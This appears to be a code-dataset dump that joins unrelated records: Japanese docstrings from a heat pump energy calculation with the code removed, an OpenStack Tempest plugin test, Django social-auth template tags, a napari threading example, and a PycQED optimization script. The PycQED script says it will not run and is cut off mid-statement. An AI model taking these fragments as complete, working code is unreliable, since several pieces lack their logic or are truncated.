(-) (4b) Args: Returns: float: Kevph1:蒸発温度を計算する式の係数 Kevph2:蒸発温度を計算する式の係数 (-) (4b) Args: Returns: float: Kevph2:蒸発温度を計算する式の係数 Kevph12:蒸発温度を計算する式の係数 (-) (4b) Args: Returns: float: Kevph12:蒸発温度を計算する式の係数 日付dの時刻tにおけるヒートポンプサイクルの凝縮温度(℃)(5a) Args: qr_out_H_hs_d_t(param Theta_SW_d_t: 日付dの時刻tにおける往き温水温度(℃)): 日付dの時刻tにおける温水暖房用熱源機の最大暖房能力に対する平均負荷率(-) Theta_SW_d_t(ndarray): 日付dの時刻tにおける往き温水温度(℃) Returns: ndarray: 日付dの時刻tにおけるヒートポンプサイクルの凝縮温度(℃) # Kcndh0:凝縮温度を計算する式の係数 (-) (5b) # Kcndh1:凝縮温度を計算する式の係数 (-) (5b) # Kcndh2:凝縮温度を計算する式の係数 (-) (5b) # Kcndh12:凝縮温度を計算する式の係数 (-) (5b) # 日付dの時刻tにおけるヒートポンプサイクルの蒸発温度(℃) (5a) Kcndh0:凝縮温度を計算する式の係数 (-) (5b) Args: Returns: float: Kcndh0:凝縮温度を計算する式の係数 Kcndh1:凝縮温度を計算する式の係数 (-) (5b) Args: Returns: float: Kcndh1:凝縮温度を計算する式の係数 Kcndh2:凝縮温度を計算する式の係数 (-) (5b) Args: Returns: float: Kcndh2:凝縮温度を計算する式の係数 Kcndh12:凝縮温度を計算する式の係数 (-) (5b) Args: Returns: ndarray: Kcndh12:凝縮温度を計算する式の係数 日付dの時刻tにおけるヒートポンプサイクルの過冷却度(℃)(6a) Args: qr_out_H_hs_d_t(ndarray): 日付dの時刻tにおける温水暖房用熱源機の最大暖房能力に対する平均負荷率(-) Theta_SW_d_t(ndarray): 往き温水温度 (℃) Returns: ndarray: 日付dの時刻tにおけるヒートポンプサイクルの過冷却度(℃) # Ksch0:過冷却度を計算する式の係数 (-) (6b) # Ksch1:過冷却度を計算する式の係数 (-) (6b) 
# Ksch2:過冷却度を計算する式の係数 (-) (6b) # 日付dの時刻tにおけるヒートポンプサイクルの過冷却度(℃) (6a) Ksch0:過冷却度を計算する式の係数(-) (6b) Args: Returns: float: Ksch0:過冷却度を計算する式の係数(-) (6b) Ksch1:過冷却度を計算する式の係数 (-) (6b) Args: Returns: float: Ksch1:過冷却度を計算する式の係数 Ksch2:過冷却度を計算する式の係数 (-) (6b) Args: Returns: float: Ksch2:過冷却度を計算する式の係数 日付dの時刻tにおけるヒートポンプサイクルの過熱度(℃)(7a) Args: qr_out_H_hs_d_t(ndarray): 日付dの時刻tにおける温水暖房用熱源機の最大暖房能力に対する平均負荷率(-) Theta_gsRW_d_ave_d(ndarray): 日付dにおける地中熱交換器からの戻り熱源水の日平均温度(℃) Returns: ndarray: 日付dの時刻tにおけるヒートポンプサイクルの過熱度(℃) # Kshh0:過熱度を計算する式の係数 (-) (7b) # Kshh1:過熱度を計算する式の係数 (-) (7b) # Kshh2:過熱度を計算する式の係数 (-) (7b) # 日付dの時刻tにおけるヒートポンプサイクルの過熱度(℃) (7a) Kshh0:過熱度を計算する式の係数(-) (7b) Args: Returns: float: Kshh0:過熱度を計算する式の係数 Kshh1:過熱度を計算する式の係数 (-) (7b) Args: Returns: float: Kshh1:過熱度を計算する式の係数 (-) Kshh2:過熱度を計算する式の係数 (-) (7b) Args: Returns: Kshh2:過熱度を計算する式の係数 (-) # ============================================================================ # N.5 ポンプの消費電力量 # ============================================================================ 日付dの時刻tにおける1時間当たりのポンプの消費電力量 (8) Args: E_pump_SW_d_t(ndarray): 日付dの時刻tにおける1時間当たりの送水ポンプの消費電力量(kWh/h) E_pump_gsRW_d_t(ndarray): 日付dの時刻tにおける1時間当たりの熱源水ポンプの消費電力量(kWh/h) Returns: ndarray: 日付dの時刻tにおける1時間当たりのポンプの消費電力量(kWh/h) # 日付dの時刻tにおける1時間当たりのポンプの消費電力量 (8) 日付dの時刻tにおける1時間当たりの送水ポンプの消費電力量(kWh/h) (9a) Args: qr_out_H_hs_d_t(ndarray): 日付dの時刻tにおける温水暖房用熱源機の最大暖房能力に対する平均負荷率(-) Returns: ndarray: 日付dの時刻tにおける1時間当たりの送水ポンプの消費電力量(kWh/h) # apump,SW:送水ポンプの消費電力量を計算する式の係数 (-) (9b) # bpump,SW:送水ポンプの消費電力量を計算する式の係数 (-) (9b) # 日付dの時刻tにおける1時間当たりの送水ポンプの消費電力量(kWh/h) (9a) apump,SW:送水ポンプの消費電力量を計算する式の係数 (-) (9b) Args: Returns: float: apump,SW:送水ポンプの消費電力量を計算する式の係数 (-) bpump,SW:送水ポンプの消費電力量を計算する式の係数 (-) (9b) Args: Returns: float: bpump,SW:送水ポンプの消費電力量を計算する式の係数 (-) 日付dの時刻tにおける1時間当たりの熱源水ポンプの消費電力量(kWh/h) (10a) Args: qr_out_H_hs_d_t(ndarray): 日付dの時刻tにおける温水暖房用熱源機の最大暖房能力に対する平均負荷率(-) Returns: ndarray: 日付dの時刻tにおける1時間当たりの熱源水ポンプの消費電力量(kWh/h) # apump,gsRW:熱源水ポンプの消費電力量を計算する式の係数 (-) (10b) # bpump,gsRW:熱源水ポンプの消費電力量を計算する式の係数 (-) 
(10b) # 日付dの時刻tにおける1時間当たりの熱源水ポンプの消費電力量(kWh/h) (10a) apump,gsRW:熱源水ポンプの消費電力量を計算する式の係数 (-) (10b) Args: Returns: float: apump,gsRW:熱源水ポンプの消費電力量を計算する式の係数 (-) bpump,gsRW:熱源水ポンプの消費電力量を計算する式の係数 (-) (10b) Args: Returns: bpump,gsRW:熱源水ポンプの消費電力量を計算する式の係数 (-) # ============================================================================ # N.6 補機の消費電力量 # ============================================================================ 日付dの時刻tにおける1時間当たりの補機の消費電力量(kWh/h) (11a) Args: qr_out_H_hs_d_t(ndarray): 日付dの時刻tにおける温水暖房用熱源機の最大暖房能力に対する平均負荷率(-) Returns: ndarray: 日付dの時刻tにおける1時間当たりの補機の消費電力量(kWh/h) # kauxh0:補機の消費電力量を計算する式の係数 (-) (11b) # kauxh1:補機の消費電力量を計算する式の係数 (-) (11b) # 日付dの時刻tにおける1時間当たりの熱源水ポンプの消費電力量(kWh/h) (11a) kauxh0:補機の消費電力量を計算する式の係数 (-) (11b) Args: Returns: float: kauxh0:補機の消費電力量を計算する式の係数 (-) kauxh1:補機の消費電力量を計算する式の係数 (-) (11b) Args: Returns: float: kauxh1:補機の消費電力量を計算する式の係数 (-) # ============================================================================ # N.7 温水暖房用熱源機の最大暖房能力に対する平均負荷率 # ============================================================================ 日付dの時刻tにおける温水暖房用熱源機の最大暖房能力に対する平均負荷率(-) (12) Args: q_out_H_hs_d_t(ndarray): 日付dの時刻tにおける温水暖房用熱源機の最大暖房能力に対する平均負荷率(-) q_max_H_hs_JRA(ndarray): 地中からの戻り熱源水温度および送水温度による補正後の最大暖房能力(W) Returns: ndarray: 日付dの時刻tにおける温水暖房用熱源機の最大暖房能力に対する平均負荷率(-) # 日付dの時刻tにおける温水暖房用熱源機の最大暖房能力に対する平均負荷率(-) (12) # ============================================================================ # N.8 温水暖房用熱源機の平均暖房出力 # ============================================================================ 日付dの時刻tにおける温水暖房用熱源機の平均暖房出力(kW) (13) Args: Q_out_H_hs_d_t(ndarray): 日付dの時刻tにおける1時間当たりの温水暖房用熱源機の暖房出力(MJ/h) Returns: ndarray: 日付dの時刻tにおける温水暖房用熱源機の平均暖房出力(kW) # 日付dの時刻tにおける温水暖房用熱源機の平均暖房出力(kW)(13) 日付dの時刻tにおける1時間当たりの温水暖房用熱源機の暖房出力(MJ/h)(14) Args: Q_dmd_H_hs_d_t(ndarray): 日付dの時刻tにおける1時間当たりの温水暖房用熱源機の温水熱需要(MJ/h) Q_max_H_hs_d_t(ndarray): 日付dの時刻tにおける1時間当たりの温水暖房用熱源機の最大暖房出力(MJ/h) Returns: ndarray: 日付dの時刻tにおける1時間当たりの温水暖房用熱源機の暖房出力(MJ/h) # 日付dの時刻tにおける温水暖房用熱源機の平均暖房出力(kW)(14) 
日付dの時刻tにおける1時間当たりの温水暖房用熱源機の最大暖房出力(MJ/h) (15) Args: Theta_SW_d_t(ndarray): 往き温水温度 (℃) Theta_ex_d_Ave_d(ndarray): 日付dにおける日平均外気温度 (℃) Theta_ex_H_Ave(float): 暖房期における期間平均外気温度(℃) Theta_ex_a_Ave(float): 年平均外気温度 (℃) q_max_hs(float): 熱源機の最大暖房能力 ⒲ L_H_x_t_i(ndarray): 暖冷房区画iの1時間当たりの暖房負荷 L_CS_x_t_i(ndarray): 日付dの時刻tにおける暖冷房区画iの冷房顕熱負荷 (MJ/h) L_CL_x_t_i(ndarray): 日付dの時刻tにおける暖冷房区画iの冷房潜熱負荷 (MJ/h) HeatExchangerType(str): 熱交換器タイプ (-) Returns: ndarray: 日付dの時刻tにおける1時間当たりの温水暖房用熱源機の最大暖房出力(MJ/h) # ---------- 地中熱交換器からの戻り熱源水の日平均温度 ---------- # 1日当たりの冷房全熱負荷の年間最大値(MJ/d)(20c) # 1日当たりの暖房負荷の年間最大値(MJ/d)(20b) # 1日当たりの暖房負荷の年間最大値と1日当たりの冷房負荷の年間最大値の和に対する、これらの差の比(-)(20a) # 地中熱交換器からの戻り熱源水温度を求める式の係数(-)(19) # 暖房期における地中熱交換器からの戻り熱源水の期間平均温度と年平均外気温度との差(℃)(18) # 日付dにおける地中熱交換器からの戻り熱源水の日平均温度(℃)(17) # ---------- 地中からの戻り熱源水温度および送水温度による補正後の最大暖房能力(W) (16) ---------- # ---------- 日付dの時刻tにおける1時間当たりの温水暖房用熱源機の最大暖房出力(MJ/h)(15) ---------- # ============================================================================ # N.9 温水暖房用熱源機内の平均放熱損失 # ============================================================================ 日付dの時刻tにおける温水暖房用熱源機内の平均放熱損失(kW) Args: Returns: float: 日付dの時刻tにおける温水暖房用熱源機内の平均放熱損失(kW) # ============================================================================ # N.10 地中からの戻り熱源水温度および送水温度による補正後の最大暖房能力 # ============================================================================ 地中からの戻り熱源水温度および送水温度による補正後の最大暖房能力(W) (16) Args: q_max_hs(return: 地中からの戻り熱源水温度および送水温度による補正後の最大暖房能力(W)): 熱源機の最大暖房能力 ⒲ Returns: 地中からの戻り熱源水温度および送水温度による補正後の最大暖房能力(W) # 地中からの戻り熱源水温度および送水温度に関する最大暖房能力の補正係数(-) # 地中からの戻り熱源水温度および送水温度による補正後の最大暖房能力(W)(16) 温水暖房用熱源機の定格能力 Args: region(int): 省エネルギー地域区分 A_A(float): 床面積の合計 (m2) A_MR(float): 主たる居室の床面積 (m2) A_OR(float): その他の居室の床面積 (m2) mode_MR(str): 主たる居室の運転モード 'い', 'ろ', 'は' mode_OR(str): その他の居室の運転モード 'い', 'ろ', 'は' has_MR_hwh(bool): 温水暖房の放熱器を主たる居室に設置する場合はTrue has_OR_hwh(bool): 温水暖房の放熱器をその他の居室に設置する場合はTrue Returns: float: 温水暖房用熱源機の定格能力 # 付録Hに定める温水暖房用熱源機の最大能力 q_max_hs に等しい 
地中からの戻り熱源水温度および送水温度に関する最大暖房能力の補正係数(-) Args: Returns: float: 地中からの戻り熱源水温度および送水温度に関する最大暖房能力の補正係数(-) # ============================================================================ # N.11 地中熱交換器からの戻り熱源水の日平均温度 # ============================================================================ 日付dにおける地中熱交換器からの戻り熱源水の日平均温度(℃) (17) Args: K_gsRW_H(float): K_gsRW_H: 地中熱交換器からの戻り熱源水温度を求める式の係数(-) Theta_ex_d_Ave_d(ndarray): 日付dにおける日平均外気温度 (℃) Theta_ex_H_Ave(float): 暖房期における期間平均外気温度(℃) Theta_ex_a_Ave(float): 年平均外気温度 (℃) Delta_Theta_gsRW_H(float): 暖房期における地中熱交換器からの戻り熱源水の期間平均温度と年平均外気温度との差(℃) Returns: ndarray: 日付dにおける地中熱交換器からの戻り熱源水の日平均温度(℃) # 日付dにおける地中熱交換器からの戻り熱源水の日平均温度(℃) (17) 暖房期における地中熱交換器からの戻り熱源水の期間平均温度と年平均外気温度との差(℃)(18) Args: R_L_max(float): 1日当たりの暖房負荷の年間最大値と1日当たりの冷房負荷の年間最大値の和に対する、これらの差の比(-) HeatExchangerType(str): 地中熱交換器タイプ Returns: float: 暖房期における地中熱交換器からの戻り熱源水の期間平均温度と年平均外気温度との差(℃) # 熱交換器タイプに応じた係数取得 # 暖房期における地中熱交換器からの戻り熱源水の期間平均温度と年平均外気温度との差(℃)(18) 地中熱交換器からの戻り熱源水温度を求める式の係数(-)(19) Args: R_L_max(float): 1日当たりの暖房負荷の年間最大値と1日当たりの冷房負荷の年間最大値の和に対する、これらの差の比(-) HeatExchangerType(str): 熱交換器タイプ (-) Returns: float: 地中熱交換器からの戻り熱源水温度を求める式の係数(-)(19) # 熱交換器タイプに応じた係数取得 # 地中熱交換器からの戻り熱源水温度を求める式の係数(-)(19) 熱交換器タイプに応じた係数a_gsRW_Hの取得 Args: HeatExchangerType(str): 熱交換器タイプ (-) Returns: float: 熱交換器タイプに応じた係数a_gsRW_Hの取得 熱交換器タイプに応じた係数b_gsRW_Hの取得 Args: HeatExchangerType(str): 熱交換器タイプ (-) Returns: float: 熱交換器タイプに応じた係数b_gsRW_Hの取得 熱交換器タイプに応じた係数a_gsRW_Hの取得 Args: HeatExchangerType(str): 熱交換器タイプ (-) Returns: float: 熱交換器タイプに応じた係数a_gsRW_Hの取得 熱交換器タイプに応じた係数b_gsRW_Hの取得 Args: HeatExchangerType(str): 熱交換器タイプ (-) Returns: float: 熱交換器タイプに応じた係数b_gsRW_Hの取得 表N.3 係数 Args: Returns: list: 表N.3 係数 1日当たりの暖房負荷の年間最大値と1日当たりの冷房負荷の年間最大値の和に対する、これらの差の比(-)(20a) Args: L_max_H(float): 1日当たりの暖房負荷の年間最大値(MJ/d) L_max_C(float): 1日当たりの冷房全熱負荷の年間最大値(MJ/d) Returns: float: 1日当たりの暖房負荷の年間最大値と1日当たりの冷房負荷の年間最大値の和に対する、これらの差の比(-)(20a) # 1日当たりの暖房負荷の年間最大値と1日当たりの冷房負荷の年間最大値の和に対する、これらの差の比(-)(20a) 1日当たりの暖房負荷の年間最大値(MJ/d)(20b) Args: L_H_x_t_i(ndarray): 暖冷房区画iの1時間当たりの暖房負荷 
Returns: float: 1日当たりの暖房負荷の年間最大値(MJ/d) # L_H_x_t_iは暖冷房区画毎に365日×24時間分の負荷を持った2次元配列 # 暖冷房区画軸合算(暖冷房区画の次元をなくす) # 1次元配列を2次元配列に形状変換する # 時間軸合算 # 1日当たりの暖房負荷の年間最大値(MJ/d)(20b) 1日当たりの冷房全熱負荷の年間最大値(MJ/d)(20c) Args: L_CS_x_t_i(ndarray): 日付dの時刻tにおける暖冷房区画iの冷房顕熱負荷 (MJ/h) L_CL_x_t_i(ndarray): 日付dの時刻tにおける暖冷房区画iの冷房潜熱負荷 (MJ/h) Returns: float: 1日当たりの冷房全熱負荷の年間最大値(MJ/d) # 暖冷房区画軸合算(暖冷房区画の次元をなくす) # L_CS_x_tとL_CL_x_tの要素同士を足す # 1次元配列を2次元配列に形状変換する # 時間軸合算 # 1日当たりの冷房全熱負荷の年間最大値(MJ/d)(20c)
2.227813
2
tempest/tests/test_tempest_plugin.py
mail2nsrajesh/tempest
1
6627906
# Copyright (c) 2015 Deutsche Telekom AG # All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. from tempest.lib.services import clients from tempest.test_discover import plugins from tempest.tests import base from tempest.tests import fake_tempest_plugin as fake_plugin class TestPluginDiscovery(base.TestCase): def test_load_tests_with_one_plugin(self): # we can't mock stevedore since it's a singleton and already executed # during test discovery. So basically this test covers the plugin loop # and the abstract plugin interface. 
manager = plugins.TempestTestPluginManager() fake_obj = fake_plugin.FakeStevedoreObj() manager.ext_plugins = [fake_obj] result = manager.get_plugin_load_tests_tuple() self.assertEqual(fake_plugin.FakePlugin.expected_load_test, result[fake_obj.name]) def test_load_tests_with_two_plugins(self): manager = plugins.TempestTestPluginManager() obj1 = fake_plugin.FakeStevedoreObj('fake01') obj2 = fake_plugin.FakeStevedoreObj('fake02') manager.ext_plugins = [obj1, obj2] result = manager.get_plugin_load_tests_tuple() self.assertEqual(fake_plugin.FakePlugin.expected_load_test, result['fake01']) self.assertEqual(fake_plugin.FakePlugin.expected_load_test, result['fake02']) def test__register_service_clients_with_one_plugin(self): registry = clients.ClientsRegistry() manager = plugins.TempestTestPluginManager() fake_obj = fake_plugin.FakeStevedoreObj() manager.ext_plugins = [fake_obj] manager._register_service_clients() expected_result = fake_plugin.FakePlugin.expected_service_clients registered_clients = registry.get_service_clients() self.assertIn(fake_obj.name, registered_clients) self.assertEqual(expected_result, registered_clients[fake_obj.name]) def test__get_service_clients_with_two_plugins(self): registry = clients.ClientsRegistry() manager = plugins.TempestTestPluginManager() obj1 = fake_plugin.FakeStevedoreObj('fake01') obj2 = fake_plugin.FakeStevedoreObj('fake02') manager.ext_plugins = [obj1, obj2] manager._register_service_clients() expected_result = fake_plugin.FakePlugin.expected_service_clients registered_clients = registry.get_service_clients() self.assertIn('fake01', registered_clients) self.assertIn('fake02', registered_clients) self.assertEqual(expected_result, registered_clients['fake01']) self.assertEqual(expected_result, registered_clients['fake02']) def test__register_service_clients_one_plugin_no_service_clients(self): registry = clients.ClientsRegistry() manager = plugins.TempestTestPluginManager() fake_obj = 
fake_plugin.FakeStevedoreObjNoServiceClients() manager.ext_plugins = [fake_obj] manager._register_service_clients() registered_clients = registry.get_service_clients() self.assertNotIn(fake_obj.name, registered_clients)
# Copyright (c) 2015 Deutsche Telekom AG # All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. from tempest.lib.services import clients from tempest.test_discover import plugins from tempest.tests import base from tempest.tests import fake_tempest_plugin as fake_plugin class TestPluginDiscovery(base.TestCase): def test_load_tests_with_one_plugin(self): # we can't mock stevedore since it's a singleton and already executed # during test discovery. So basically this test covers the plugin loop # and the abstract plugin interface. 
manager = plugins.TempestTestPluginManager() fake_obj = fake_plugin.FakeStevedoreObj() manager.ext_plugins = [fake_obj] result = manager.get_plugin_load_tests_tuple() self.assertEqual(fake_plugin.FakePlugin.expected_load_test, result[fake_obj.name]) def test_load_tests_with_two_plugins(self): manager = plugins.TempestTestPluginManager() obj1 = fake_plugin.FakeStevedoreObj('fake01') obj2 = fake_plugin.FakeStevedoreObj('fake02') manager.ext_plugins = [obj1, obj2] result = manager.get_plugin_load_tests_tuple() self.assertEqual(fake_plugin.FakePlugin.expected_load_test, result['fake01']) self.assertEqual(fake_plugin.FakePlugin.expected_load_test, result['fake02']) def test__register_service_clients_with_one_plugin(self): registry = clients.ClientsRegistry() manager = plugins.TempestTestPluginManager() fake_obj = fake_plugin.FakeStevedoreObj() manager.ext_plugins = [fake_obj] manager._register_service_clients() expected_result = fake_plugin.FakePlugin.expected_service_clients registered_clients = registry.get_service_clients() self.assertIn(fake_obj.name, registered_clients) self.assertEqual(expected_result, registered_clients[fake_obj.name]) def test__get_service_clients_with_two_plugins(self): registry = clients.ClientsRegistry() manager = plugins.TempestTestPluginManager() obj1 = fake_plugin.FakeStevedoreObj('fake01') obj2 = fake_plugin.FakeStevedoreObj('fake02') manager.ext_plugins = [obj1, obj2] manager._register_service_clients() expected_result = fake_plugin.FakePlugin.expected_service_clients registered_clients = registry.get_service_clients() self.assertIn('fake01', registered_clients) self.assertIn('fake02', registered_clients) self.assertEqual(expected_result, registered_clients['fake01']) self.assertEqual(expected_result, registered_clients['fake02']) def test__register_service_clients_one_plugin_no_service_clients(self): registry = clients.ClientsRegistry() manager = plugins.TempestTestPluginManager() fake_obj = 
fake_plugin.FakeStevedoreObjNoServiceClients() manager.ext_plugins = [fake_obj] manager._register_service_clients() registered_clients = registry.get_service_clients() self.assertNotIn(fake_obj.name, registered_clients)
en
0.890241
# Copyright (c) 2015 Deutsche Telekom AG # All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # we can't mock stevedore since it's a singleton and already executed # during test discovery. So basically this test covers the plugin loop # and the abstract plugin interface.
1.990282
2
example-django/app/templatetags/backend_utils.py
noisy/python-social-auth-steemconnect-examples
6
6627907
<reponame>noisy/python-social-auth-steemconnect-examples import re from django import template from social_core.backends.oauth import OAuthAuth from social_django.utils import Storage register = template.Library() name_re = re.compile(r'([^O])Auth') @register.filter def backend_name(backend): name = backend.__class__.__name__ name = name.replace('OAuth', ' OAuth') name = name.replace('OpenId', ' OpenId') name = name.replace('Sandbox', '') name = name_re.sub(r'\1 Auth', name) return name @register.filter def backend_class(backend): return backend.name.replace('-', ' ') @register.filter def order_backends(backends): order = { 'steemconnect': 0, 'facebook': 1, 'github': 2, 'twitter': 3, 'google-oauth2': 4, } backends = list(backends) backends.sort(key=lambda backend: order[backend[0]]) return backends @register.filter def icon_name(name): return { 'steemconnect': 'steem', 'stackoverflow': 'stack-overflow', 'google-oauth': 'google', 'google-oauth2': 'google', 'google-openidconnect': 'google', 'yahoo-oauth': 'yahoo', 'facebook-app': 'facebook', 'email': 'envelope', 'vimeo': 'vimeo-square', 'linkedin-oauth2': 'linkedin', 'vk-oauth2': 'vk', 'live': 'windows', 'username': 'user', }.get(name, name) @register.filter def social_backends(backends): backends = [(name, backend) for name, backend in backends.items() if name not in ['username', 'email']] backends.sort(key=lambda b: b[0]) return [backends[n:n + 10] for n in range(0, len(backends), 10)] @register.filter def legacy_backends(backends): backends = [(name, backend) for name, backend in backends.items() if name in ['username', 'email']] backends.sort(key=lambda b: b[0]) return backends @register.filter def oauth_backends(backends): backends = [(name, backend) for name, backend in backends.items() if issubclass(backend, OAuthAuth)] backends.sort(key=lambda b: b[0]) return backends @register.simple_tag(takes_context=True) def associated(context, backend): user = context.get('user') context['association'] = None if user and 
user.is_authenticated(): context['association'] = Storage.user.get_social_auth_for_user( user, backend.name ).first() return ''
import re from django import template from social_core.backends.oauth import OAuthAuth from social_django.utils import Storage register = template.Library() name_re = re.compile(r'([^O])Auth') @register.filter def backend_name(backend): name = backend.__class__.__name__ name = name.replace('OAuth', ' OAuth') name = name.replace('OpenId', ' OpenId') name = name.replace('Sandbox', '') name = name_re.sub(r'\1 Auth', name) return name @register.filter def backend_class(backend): return backend.name.replace('-', ' ') @register.filter def order_backends(backends): order = { 'steemconnect': 0, 'facebook': 1, 'github': 2, 'twitter': 3, 'google-oauth2': 4, } backends = list(backends) backends.sort(key=lambda backend: order[backend[0]]) return backends @register.filter def icon_name(name): return { 'steemconnect': 'steem', 'stackoverflow': 'stack-overflow', 'google-oauth': 'google', 'google-oauth2': 'google', 'google-openidconnect': 'google', 'yahoo-oauth': 'yahoo', 'facebook-app': 'facebook', 'email': 'envelope', 'vimeo': 'vimeo-square', 'linkedin-oauth2': 'linkedin', 'vk-oauth2': 'vk', 'live': 'windows', 'username': 'user', }.get(name, name) @register.filter def social_backends(backends): backends = [(name, backend) for name, backend in backends.items() if name not in ['username', 'email']] backends.sort(key=lambda b: b[0]) return [backends[n:n + 10] for n in range(0, len(backends), 10)] @register.filter def legacy_backends(backends): backends = [(name, backend) for name, backend in backends.items() if name in ['username', 'email']] backends.sort(key=lambda b: b[0]) return backends @register.filter def oauth_backends(backends): backends = [(name, backend) for name, backend in backends.items() if issubclass(backend, OAuthAuth)] backends.sort(key=lambda b: b[0]) return backends @register.simple_tag(takes_context=True) def associated(context, backend): user = context.get('user') context['association'] = None if user and user.is_authenticated(): context['association'] = 
Storage.user.get_social_auth_for_user( user, backend.name ).first() return ''
none
1
2.175033
2
examples/interactive_scripting.py
mrocklin/napari
1
6627908
<reponame>mrocklin/napari<filename>examples/interactive_scripting.py import numpy as np import napari from napari.qt import thread_worker import time with napari.gui_qt(): # create the viewer with an image data = np.random.random((512, 512)) viewer = napari.Viewer() layer = viewer.add_image(data) @thread_worker(start_thread=True) def layer_update(*, update_period, num_updates): # number of times to update for k in range(num_updates): time.sleep(update_period) dat = np.random.random((512, 512)) layer.data = dat # check that data layer is properly assigned and not blocked? while layer.data.all() != dat.all(): layer.data = dat yield layer_update(update_period=0.05, num_updates=100)
import numpy as np import napari from napari.qt import thread_worker import time with napari.gui_qt(): # create the viewer with an image data = np.random.random((512, 512)) viewer = napari.Viewer() layer = viewer.add_image(data) @thread_worker(start_thread=True) def layer_update(*, update_period, num_updates): # number of times to update for k in range(num_updates): time.sleep(update_period) dat = np.random.random((512, 512)) layer.data = dat # check that data layer is properly assigned and not blocked? while layer.data.all() != dat.all(): layer.data = dat yield layer_update(update_period=0.05, num_updates=100)
en
0.875352
# create the viewer with an image # number of times to update # check that data layer is properly assigned and not blocked?
2.771127
3
examples/numerical_optimizations.py
sergimasot/PycQED_py3
1
6627909
# import numpy as np # import scipy # from pycqed.measurement import sweep_functions as swf # from sweep_functions import (Sweep_function, Soft_Sweep) # from pycqed.measurement import AWG_sweep_functions as awg_swf # from pycqed.measurement import detector_functions as det # import matplotlib.pyplot as plt # from pycqed.analysis import measurement_analysis as MA ''' Warning: This code will not run as it is written in python2 for qtlab. However it is here to serve as an example of using the different options in the numerical optimizations. ''' FakeSample = qt.instruments.create('FakeSample', 'Bart_parameter_holder', dummy_instrument=True) MC = qt.instruments['MC'] try: MC.remove() except: pass MC = qt.instruments.create('MC', 'MeasurementControl', dummy_instrument=True) ''' Plan for fixing issue 154 1. clean up passing of arguments V 2. Make MC work with arbitrary optimization functions V 3. set mode as argument to MC (no longer global setting) V 4. get rid of the "scaling" parameter use stepsize instead -V 5. 
add termination condition V ''' class sweep_function1(Soft_Sweep): def __init__(self, **kw): super(sweep_function1, self).__init__() # From Soft_Sweep the self.sweep_control = 'soft' self.name = 'Sweep_function1' self.parameter_name = 'x' self.unit = 'unit_x' self.FakeSample = qt.instruments['FakeSample'] def set_parameter(self, val): self.FakeSample.set_x(val) class sweep_function2(Soft_Sweep): def __init__(self, **kw): super(sweep_function2, self).__init__() self.name = 'Sweep_function2' self.parameter_name = 'y' self.unit = 'unit_y' self.FakeSample = qt.instruments['FakeSample'] def set_parameter(self, val): self.FakeSample.set_y(val) class test_detector(object): def __init__(self, **kw): self.FakeSample = qt.instruments['FakeSample'] self.detector_control = 'soft' def acquire_data_point(self, **kw): return self.FakeSample.measure_convexity() def prepare(self,**kw): pass def finish(self,**kw): pass class test_parabolic_detector(test_detector): def __init__(self, **kw): super(test_parabolic_detector, self).__init__() self.value_names = 'F' self.value_units = 'unit_F' def acquire_data_point(self, **kw): return self.FakeSample.measure_2D_sinc() #sweepfunctions and detector sweepfunctions = [sweep_function1(), sweep_function2()] detector = test_parabolic_detector() start_val = np.array([1, 1]) initial_stepsize = np.array([-.1, .2]) # Initial guess x0 = start_val/initial_stepsize # Scaling parameters x_scale = 1/initial_stepsize bounds0 = np.array([(-100, 100), (-100, 100)]).T/initial_stepsize # needs to be rearranged bounds = np.zeros((len(bounds0[0]),2)) # Bounds for parameters (unused in Powell) for i in range(len(bounds0[0])): bounds[i][0] = bounds0[0][i] bounds[i][1] = bounds0[1][i] ftol = 1e-3 xtol = 1e-4 maxiter = 500 # Maximum No. iterations maxfun = 500 # Maximum No. 
function evaluations factr = 1e7 #1e7 pgtol = 1e-1 #2e-2 epsilon = 1e-1 #1e-2 epsilon_COBYLA = 0.2 # Initial step length accuracy_COBYLA = 1e-2 # Convergence tolerance constraints = np.array([100, 100]) minimize = True noise = 0.01 # Maximum amplitude of the Zero-Mean White Noise FakeSample.set_noise(noise) # Example 1 find optimum using Powell method: name = 'Powell method' MC.set_sweep_functions(sweepfunctions) # sets swf1 and swf2 MC.set_detector_function(detector) # sets test_detector ad_func_pars = {'adaptive_function': 'Powell', 'x0': x0, 'x_scale': x_scale, 'ftol': ftol, 'xtol': xtol, 'maxiter': maxiter, 'maxfun': maxfun, 'minimize': minimize} MC.set_adaptive_function_parameters(ad_func_pars) MC.run(name=name, mode='adaptive') MA.OptimizationAnalysis(auto=True, label=name) # Example 2 find optimum by using a function that got passed by hand. name = 'Nelder method' ad_func_pars = {'adaptive_function': scipy.optimize.fmin, 'x0': x0, 'x_scale': x_scale, 'ftol': ftol, 'xtol': xtol, 'maxiter': maxiter, 'maxfun': maxfun, 'minimize': minimize} MC.set_adaptive_function_parameters(ad_func_pars) MC.run(name=name, mode='adaptive') MA.OptimizationAnalysis(auto=True, label=name) # Example 3 make use of termination condition name = 'Nelder_with_termination' ad_func_pars = {'adaptive_function': scipy.optimize.fmin, 'x0': x0, 'x_scale': x_scale, 'ftol': ftol, 'xtol': xtol, 'maxiter': maxiter, 'maxfun': maxfun, 'minimize': minimize, 'f_termination': -1.95} MC.set_adaptive_function_parameters(ad_func_pars) MC.run(name=name, mode='adaptive') MA.OptimizationAnalysis(auto=True, label=name) # Example 4 make use of termination condition with maximize name = 'Nelder_maximize' ad_func_pars = {'adaptive_function': scipy.optimize.fmin, 'x0': x0, 'x_scale': x_scale, 'ftol': ftol, 'xtol': xtol, 'maxiter': maxiter, 